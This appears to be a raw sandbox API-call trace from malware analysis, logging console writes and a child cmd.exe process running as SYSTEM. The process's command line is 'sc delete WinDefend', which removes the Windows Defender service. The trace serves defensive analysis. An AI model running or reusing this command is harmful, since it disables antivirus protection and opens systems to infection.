	[0090.636] GetLastError () returned 0xcb
	[0090.636] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.637] GetLastError () returned 0xcb
	[0090.637] CloseHandle (hObject=0x6b) returned 1
	[0090.637] GetLastError () returned 0xcb
	[0090.639] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0090.639] GetLastError () returned 0xcb
	[0090.640] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.640] GetLastError () returned 0xcb
	[0090.642] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f
	[0090.642] GetLastError () returned 0xcb
	[0090.642] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.642] GetLastError () returned 0xcb
	[0090.645] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73
	[0090.645] GetLastError () returned 0xcb
	[0090.645] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.645] GetLastError () returned 0xcb
	[0090.648] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0090.648] GetLastError () returned 0xcb
	[0090.648] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.648] GetLastError () returned 0xcb
	[0090.648] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0090.648] GetLastError () returned 0xcb
	[0090.648] CloseHandle (hObject=0x77) returned 1
	[0090.648] GetLastError () returned 0xcb
	[0090.651] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0090.651] GetLastError () returned 0xcb
	[0090.651] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.651] GetLastError () returned 0xcb
	[0090.651] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0090.651] GetLastError () returned 0xcb
	[0090.651] CloseHandle (hObject=0x77) returned 1
	[0090.652] GetLastError () returned 0xcb
	[0090.654] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0090.655] GetLastError () returned 0xcb
	[0090.655] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.655] GetLastError () returned 0xcb
	[0090.655] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x19a5264*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a5264*, lpNumberOfCharsWritten=0x43aea0c*=0x36) returned 1
	[0090.655] GetLastError () returned 0xcb
	[0090.655] CloseHandle (hObject=0x77) returned 1
	[0090.655] GetLastError () returned 0xcb
	[0090.658] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0090.658] GetLastError () returned 0xcb
	[0090.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.658] GetLastError () returned 0xcb
	[0090.658] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0090.659] GetLastError () returned 0xcb
	[0090.659] CloseHandle (hObject=0x77) returned 1
	[0090.659] GetLastError () returned 0xcb
	[0090.661] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0090.662] GetLastError () returned 0xcb
	[0090.662] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.662] GetLastError () returned 0xcb
	[0090.662] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0090.662] GetLastError () returned 0xcb
	[0090.662] CloseHandle (hObject=0x77) returned 1
	[0090.662] GetLastError () returned 0xcb
	[0090.665] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0090.665] GetLastError () returned 0xcb
	[0090.665] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.665] GetLastError () returned 0xcb
	[0090.665] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.665] GetLastError () returned 0xcb
	[0090.665] CloseHandle (hObject=0x77) returned 1
	[0090.665] GetLastError () returned 0xcb
	[0090.668] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0090.668] GetLastError () returned 0xcb
	[0090.668] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.669] GetLastError () returned 0xcb
	[0090.671] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b
	[0090.671] GetLastError () returned 0xcb
	[0090.671] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.671] GetLastError () returned 0xcb
	[0090.674] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f
	[0090.674] GetLastError () returned 0xcb
	[0090.674] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.674] GetLastError () returned 0xcb
	[0090.677] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0090.678] GetLastError () returned 0xcb
	[0090.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.678] GetLastError () returned 0xcb
	[0090.678] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0090.678] GetLastError () returned 0xcb
	[0090.678] CloseHandle (hObject=0x83) returned 1
	[0090.678] GetLastError () returned 0xcb
	[0090.681] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0090.681] GetLastError () returned 0xcb
	[0090.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.681] GetLastError () returned 0xcb
	[0090.681] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0090.681] GetLastError () returned 0xcb
	[0090.681] CloseHandle (hObject=0x83) returned 1
	[0090.681] GetLastError () returned 0xcb
	[0090.684] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0090.684] GetLastError () returned 0xcb
	[0090.684] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.684] GetLastError () returned 0xcb
	[0090.684] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x19a565c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a565c*, lpNumberOfCharsWritten=0x43aea0c*=0x1) returned 1
	[0090.685] GetLastError () returned 0xcb
	[0090.685] CloseHandle (hObject=0x83) returned 1
	[0090.685] GetLastError () returned 0xcb
	[0090.687] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0090.687] GetLastError () returned 0xcb
	[0090.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.688] GetLastError () returned 0xcb
	[0090.688] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0090.688] GetLastError () returned 0xcb
	[0090.688] CloseHandle (hObject=0x83) returned 1
	[0090.688] GetLastError () returned 0xcb
	[0090.690] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0090.691] GetLastError () returned 0xcb
	[0090.691] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.691] GetLastError () returned 0xcb
	[0090.691] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0090.691] GetLastError () returned 0xcb
	[0090.691] CloseHandle (hObject=0x83) returned 1
	[0090.691] GetLastError () returned 0xcb
	[0090.693] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0090.694] GetLastError () returned 0xcb
	[0090.694] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.694] GetLastError () returned 0xcb
	[0090.694] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.694] GetLastError () returned 0xcb
	[0090.694] CloseHandle (hObject=0x83) returned 1
	[0090.694] GetLastError () returned 0xcb
	[0090.699] CoUninitialize () 

Thread:
	id = 150
	os_tid = 0x95c

	[0090.743] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0090.771] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0090.772] VirtualQuery (in: lpAddress=0x4f4e500, lpBuffer=0x4f4f500, dwLength=0x1c | out: lpBuffer=0x4f4f500*(BaseAddress=0x4f4e000, AllocationBase=0x45c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0090.772] VirtualQuery (in: lpAddress=0x4f4e61c, lpBuffer=0x4f4f61c, dwLength=0x1c | out: lpBuffer=0x4f4f61c*(BaseAddress=0x4f4e000, AllocationBase=0x45c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0090.774] SetEvent (hEvent=0x310) returned 1
	[0090.774] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x314) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x338) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x310) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x314) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x368) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x35c) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x360) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x364) returned 1
	[0090.775] GetLastError () returned 0x0
	[0090.775] SetEvent (hEvent=0x36c) returned 1
	[0090.775] GetLastError () returned 0x0

Process:
	id = "29"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17660"
	os_pid = "0x394"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 139
	os_tid = 0x878

	[0085.202] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23fb18 | out: lpSystemTimeAsFileTime=0x23fb18*(dwLowDateTime=0x1ca1c2c0, dwHighDateTime=0x1d50a6a)) 
	[0085.202] GetCurrentProcessId () returned 0x394
	[0085.202] GetCurrentThreadId () returned 0x878
	[0085.202] GetTickCount () returned 0xa6d194
	[0085.202] QueryPerformanceCounter (in: lpPerformanceCount=0x23fb10 | out: lpPerformanceCount=0x23fb10*=15904049107) returned 1
	[0085.203] GetModuleHandleA (lpModuleName=0x0) returned 0x4a580000
	[0085.203] __set_app_type (_Type=0x1) 
	[0085.203] __p__fmode () returned 0x770231f4
	[0085.203] __p__commode () returned 0x770231fc
	[0085.203] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5a21a6) returned 0x0
	[0085.203] __getmainargs (in: _Argc=0x4a5a4238, _Argv=0x4a5a4240, _Env=0x4a5a423c, _DoWildCard=0, _StartInfo=0x4a5a4140 | out: _Argc=0x4a5a4238, _Argv=0x4a5a4240, _Env=0x4a5a423c) returned 0
	[0085.203] GetCurrentThreadId () returned 0x878
	[0085.203] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x878) returned 0x38
	[0085.203] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0085.203] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0085.203] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0085.204] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0085.204] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x23faa8 | out: phkResult=0x23faa8*=0x0) returned 0x2
	[0085.204] VirtualQuery (in: lpAddress=0x23fadf, lpBuffer=0x23fa78, dwLength=0x1c | out: lpBuffer=0x23fa78*(BaseAddress=0x23f000, AllocationBase=0x140000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0085.204] VirtualQuery (in: lpAddress=0x140000, lpBuffer=0x23fa78, dwLength=0x1c | out: lpBuffer=0x23fa78*(BaseAddress=0x140000, AllocationBase=0x140000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0085.204] VirtualQuery (in: lpAddress=0x141000, lpBuffer=0x23fa78, dwLength=0x1c | out: lpBuffer=0x23fa78*(BaseAddress=0x141000, AllocationBase=0x140000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0085.204] VirtualQuery (in: lpAddress=0x143000, lpBuffer=0x23fa78, dwLength=0x1c | out: lpBuffer=0x23fa78*(BaseAddress=0x143000, AllocationBase=0x140000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0085.204] VirtualQuery (in: lpAddress=0x240000, lpBuffer=0x23fa78, dwLength=0x1c | out: lpBuffer=0x23fa78*(BaseAddress=0x240000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0085.204] GetConsoleOutputCP () returned 0x1b5
	[0085.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0085.204] SetConsoleCtrlHandler (HandlerRoutine=0x4a59e72a, Add=1) returned 1
	[0085.204] _get_osfhandle (_FileHandle=1) returned 0x7
	[0085.204] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0085.204] _get_osfhandle (_FileHandle=1) returned 0x7
	[0085.204] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5a41ac | out: lpMode=0x4a5a41ac) returned 1
	[0085.204] _get_osfhandle (_FileHandle=1) returned 0x7
	[0085.204] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0085.205] _get_osfhandle (_FileHandle=0) returned 0x3
	[0085.205] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5a41b0 | out: lpMode=0x4a5a41b0) returned 1
	[0085.205] _get_osfhandle (_FileHandle=0) returned 0x3
	[0085.205] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x187) returned 1
	[0085.205] GetEnvironmentStringsW () returned 0x2501a8*
	[0085.205] GetProcessHeap () returned 0x240000
	[0085.205] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x892) returned 0x250a48
	[0085.205] FreeEnvironmentStringsW (penv=0x2501a8) returned 1
	[0085.205] GetProcessHeap () returned 0x240000
	[0085.205] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4) returned 0x250028
	[0085.205] GetEnvironmentStringsW () returned 0x2501a8*
	[0085.205] GetProcessHeap () returned 0x240000
	[0085.205] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x892) returned 0x2512e8
	[0085.205] FreeEnvironmentStringsW (penv=0x2501a8) returned 1
	[0085.205] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x23ea18 | out: phkResult=0x23ea18*=0x40) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x0, lpData=0x23ea24*=0xd0, lpcbData=0x23ea1c*=0x1000) returned 0x2
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x1, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x0, lpData=0x23ea24*=0x1, lpcbData=0x23ea1c*=0x1000) returned 0x2
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x0, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x40, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x40, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x0, lpData=0x23ea24*=0x40, lpcbData=0x23ea1c*=0x1000) returned 0x2
	[0085.206] RegCloseKey (hKey=0x40) returned 0x0
	[0085.206] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x23ea18 | out: phkResult=0x23ea18*=0x40) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x0, lpData=0x23ea24*=0x40, lpcbData=0x23ea1c*=0x1000) returned 0x2
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x1, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x0, lpData=0x23ea24*=0x1, lpcbData=0x23ea1c*=0x1000) returned 0x2
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x0, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x9, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x4, lpData=0x23ea24*=0x9, lpcbData=0x23ea1c*=0x4) returned 0x0
	[0085.206] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x23ea20, lpData=0x23ea24, lpcbData=0x23ea1c*=0x1000 | out: lpType=0x23ea20*=0x0, lpData=0x23ea24*=0x9, lpcbData=0x23ea1c*=0x1000) returned 0x2
	[0085.206] RegCloseKey (hKey=0x40) returned 0x0
	[0085.206] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf56
	[0085.206] srand (_Seed=0x5cdadf56) 
	[0085.206] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	[0085.206] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	[0085.206] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0085.207] GetProcessHeap () returned 0x240000
	[0085.207] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x210) returned 0x251b88
	[0085.207] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x251b90, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0085.207] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0085.207] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0085.207] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0085.207] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0085.207] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0085.207] GetProcessHeap () returned 0x240000
	[0085.207] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x250a48 | out: hHeap=0x240000) returned 1
	[0085.207] GetEnvironmentStringsW () returned 0x252658*
